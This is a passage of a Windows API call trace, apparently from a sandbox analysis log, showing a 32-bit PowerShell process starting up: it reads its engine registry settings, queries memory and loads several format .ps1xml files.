	[0224.779] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2c23290 | out: lpFileInformation=0x2c23290*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0224.780] GetLastError () returned 0x0
	[0224.780] SetErrorMode (uMode=0x1) returned 0x1
	[0224.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x29e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0224.780] GetLastError () returned 0x0
	[0224.780] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e4a8 | out: phkResult=0x29e4a8*=0x360) returned 0x0
	[0224.780] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e4f0, lpData=0x0, lpcbData=0x29e4ec*=0x0 | out: lpType=0x29e4f0*=0x1, lpData=0x0, lpcbData=0x29e4ec*=0x56) returned 0x0
	[0224.780] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e4f0, lpData=0x7a4288, lpcbData=0x29e4ec*=0x56 | out: lpType=0x29e4f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x29e4ec*=0x56) returned 0x0
	[0224.780] RegCloseKey (hKey=0x360) returned 0x0
	[0224.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x29e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0224.780] GetLastError () returned 0x0
	[0224.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x29dfe4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0224.780] GetLastError () returned 0x0
	[0225.244] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.365] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.368] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.368] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.368] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.368] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.370] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.375] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.395] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.396] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.396] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.396] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.396] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.397] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.397] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.397] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.500] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.529] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e56c | out: phkResult=0x29e56c*=0x358) returned 0x0
	[0225.529] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0x29e5d4, lpData=0x0, lpcbData=0x29e5d0*=0x0 | out: lpType=0x29e5d4*=0x1, lpData=0x0, lpcbData=0x29e5d0*=0x74) returned 0x0
	[0225.529] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0x29e5b4, lpData=0x0, lpcbData=0x29e5b0*=0x0 | out: lpType=0x29e5b4*=0x1, lpData=0x0, lpcbData=0x29e5b0*=0x74) returned 0x0
	[0225.529] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0x29e5b4, lpData=0x7a4288, lpcbData=0x29e5b0*=0x74 | out: lpType=0x29e5b4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x29e5b0*=0x74) returned 0x0
	[0225.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x29e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0225.529] GetLastError () returned 0xcb
	[0225.529] SetErrorMode (uMode=0x1) returned 0x1
	[0225.530] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x29e5b4 | out: lpFileInformation=0x29e5b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0225.530] GetLastError () returned 0xcb
	[0225.530] SetErrorMode (uMode=0x1) returned 0x1
	[0225.535] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0225.535] GetLastError () returned 0xcb
	[0225.536] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0225.536] GetLastError () returned 0xcb
	[0225.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0225.539] GetLastError () returned 0xcb
	[0225.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x29debc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.540] GetLastError () returned 0xcb
	[0225.540] SetErrorMode (uMode=0x1) returned 0x1
	[0225.540] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0225.540] GetLastError () returned 0x0
	[0225.540] GetFileType (hFile=0x32c) returned 0x1
	[0225.540] SetErrorMode (uMode=0x1) returned 0x1
	[0225.540] GetFileType (hFile=0x32c) returned 0x1
	[0225.541] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebf308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ebf308*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.541] GetLastError () returned 0x0
	[0225.541] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebf308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ebf308*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.541] GetLastError () returned 0x0
	[0225.542] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebf308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ebf308*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.542] GetLastError () returned 0x0
	[0225.542] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebf308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ebf308*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.542] GetLastError () returned 0x0
	[0225.542] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebf308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ebf308*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.543] GetLastError () returned 0x0
	[0225.543] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebf308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ebf308*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.543] GetLastError () returned 0x0
	[0225.543] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebf308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ebf308*, lpNumberOfBytesRead=0x29e424*=0x9e2, lpOverlapped=0x0) returned 1
	[0225.543] GetLastError () returned 0x0
	[0225.543] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebe88a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ebe88a*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0225.543] GetLastError () returned 0x0
	[0225.543] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebf308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ebf308*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0225.543] GetLastError () returned 0x0
	[0225.543] CloseHandle (hObject=0x32c) returned 1
	[0225.543] GetLastError () returned 0x0
	[0225.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.543] GetLastError () returned 0x0
	[0225.543] SetErrorMode (uMode=0x1) returned 0x1
	[0225.543] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2ed03c4 | out: lpFileInformation=0x2ed03c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0225.543] GetLastError () returned 0x0
	[0225.543] SetErrorMode (uMode=0x1) returned 0x1
	[0225.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.544] GetLastError () returned 0x0
	[0225.544] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e3a8 | out: phkResult=0x29e3a8*=0x32c) returned 0x0
	[0225.544] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x0, lpcbData=0x29e3ec*=0x0 | out: lpType=0x29e3f0*=0x1, lpData=0x0, lpcbData=0x29e3ec*=0x56) returned 0x0
	[0225.544] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x7a4288, lpcbData=0x29e3ec*=0x56 | out: lpType=0x29e3f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x29e3ec*=0x56) returned 0x0
	[0225.544] RegCloseKey (hKey=0x32c) returned 0x0
	[0225.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.544] GetLastError () returned 0x0
	[0225.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x29dee4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.544] GetLastError () returned 0x0
	[0225.650] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x8902bf53, Data2=0x20fd, Data3=0x4b37, Data4=([0]=0x95, [1]=0xc, [2]=0x67, [3]=0xdd, [4]=0x69, [5]=0x24, [6]=0x49, [7]=0xe1))) returned 0x0
	[0225.656] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x9ffbece8, Data2=0x3605, Data3=0x47f1, Data4=([0]=0x86, [1]=0xd5, [2]=0xa1, [3]=0x8c, [4]=0x3, [5]=0x40, [6]=0xdc, [7]=0xbb))) returned 0x0
	[0225.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29debc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0225.656] GetLastError () returned 0x0
	[0225.656] SetErrorMode (uMode=0x1) returned 0x1
	[0225.657] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0225.657] GetLastError () returned 0x0
	[0225.657] GetFileType (hFile=0x32c) returned 0x1
	[0225.657] SetErrorMode (uMode=0x1) returned 0x1
	[0225.657] GetFileType (hFile=0x32c) returned 0x1
	[0225.657] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee36ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ee36ac*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.658] GetLastError () returned 0x0
	[0225.658] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee36ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ee36ac*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.658] GetLastError () returned 0x0
	[0225.658] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee36ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ee36ac*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.658] GetLastError () returned 0x0
	[0225.659] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee36ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ee36ac*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.659] GetLastError () returned 0x0
	[0225.659] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee36ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ee36ac*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.659] GetLastError () returned 0x0
	[0225.661] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee36ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ee36ac*, lpNumberOfBytesRead=0x29e424*=0xfb2, lpOverlapped=0x0) returned 1
	[0225.661] GetLastError () returned 0x0
	[0225.661] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee2dfe, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ee2dfe*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0225.661] GetLastError () returned 0x0
	[0225.661] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee36ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2ee36ac*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0225.661] GetLastError () returned 0x0
	[0225.661] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e3a8 | out: phkResult=0x29e3a8*=0x32c) returned 0x0
	[0225.662] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x0, lpcbData=0x29e3ec*=0x0 | out: lpType=0x29e3f0*=0x1, lpData=0x0, lpcbData=0x29e3ec*=0x56) returned 0x0
	[0225.662] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x7a4288, lpcbData=0x29e3ec*=0x56 | out: lpType=0x29e3f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x29e3ec*=0x56) returned 0x0
	[0225.662] RegCloseKey (hKey=0x32c) returned 0x0
	[0225.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0225.662] GetLastError () returned 0x0
	[0225.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29dee4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0225.662] GetLastError () returned 0x0
	[0225.664] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x11df4f01, Data2=0xcec6, Data3=0x4ddb, Data4=([0]=0xb8, [1]=0xec, [2]=0x2c, [3]=0x5b, [4]=0x47, [5]=0xf, [6]=0xe6, [7]=0xbf))) returned 0x0
	[0225.674] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xb83c3bf7, Data2=0x64fb, Data3=0x4d8c, Data4=([0]=0xac, [1]=0xb7, [2]=0x5a, [3]=0xe4, [4]=0xeb, [5]=0xce, [6]=0x64, [7]=0xd8))) returned 0x0
	[0225.676] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x9eea818b, Data2=0x1669, Data3=0x4f9d, Data4=([0]=0x9e, [1]=0x68, [2]=0x95, [3]=0xd6, [4]=0x13, [5]=0xc4, [6]=0xf5, [7]=0xaa))) returned 0x0
	[0225.676] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xe49b9907, Data2=0x931b, Data3=0x44fc, Data4=([0]=0x9f, [1]=0xc4, [2]=0xbe, [3]=0x63, [4]=0x76, [5]=0x6b, [6]=0xca, [7]=0x5d))) returned 0x0
	[0225.677] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xd1f0ecda, Data2=0x5c9b, Data3=0x4b46, Data4=([0]=0x83, [1]=0xa6, [2]=0xb, [3]=0xc6, [4]=0x1, [5]=0x9d, [6]=0x97, [7]=0xf7))) returned 0x0
	[0225.677] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x5abdbcaf, Data2=0x57ab, Data3=0x480b, Data4=([0]=0x99, [1]=0x35, [2]=0xad, [3]=0xce, [4]=0x9a, [5]=0x87, [6]=0x8e, [7]=0xc9))) returned 0x0
	[0225.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29debc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.677] GetLastError () returned 0x0
	[0225.677] SetErrorMode (uMode=0x1) returned 0x1
	[0225.678] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0225.678] GetLastError () returned 0x0
	[0225.678] GetFileType (hFile=0x32c) returned 0x1
	[0225.678] SetErrorMode (uMode=0x1) returned 0x1
	[0225.678] GetFileType (hFile=0x32c) returned 0x1
	[0225.678] ReadFile (in: hFile=0x32c, lpBuffer=0x2f238e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f238e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.678] GetLastError () returned 0x0
	[0225.679] ReadFile (in: hFile=0x32c, lpBuffer=0x2f238e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f238e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.679] GetLastError () returned 0x0
	[0225.680] ReadFile (in: hFile=0x32c, lpBuffer=0x2f238e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f238e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.680] GetLastError () returned 0x0
	[0225.680] ReadFile (in: hFile=0x32c, lpBuffer=0x2f238e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f238e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.680] GetLastError () returned 0x0
	[0225.681] ReadFile (in: hFile=0x32c, lpBuffer=0x2f238e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f238e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.681] GetLastError () returned 0x0
